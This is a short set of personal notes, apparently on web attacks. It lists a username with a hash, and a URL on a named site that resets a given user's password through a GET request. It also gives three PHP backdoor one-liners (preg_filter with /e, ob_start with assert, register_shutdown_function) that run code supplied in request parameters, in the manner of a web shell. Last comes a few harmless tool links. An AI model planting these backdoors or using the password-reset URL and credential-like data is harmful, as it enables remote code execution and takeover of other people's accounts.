ld:
1.
liuyislogin
589dae7af22d8570c0ee3b36782b1b16

2.
http://me.aaisme.com//index.php/user/updatepassword?uid=8237642&newpass=123456789



bd:
1.
$_REQUEST['pass'] = 'file_put_contents("1.22","22")';
preg_filter('|.*|e', $_REQUEST['pass'], '');

2.
$_REQUEST['pass'] = 'file_put_contents("1.22","22")';
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();

3.
$e = 'assert';
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);

other:
1. sublime text theme editor:http://tmtheme-editor.herokuapp.com/#!/editor/theme/Monokai
2. 压测工具http://blog.jobbole.com/87509
3. HTMLPurifier – HTML XSS 防护
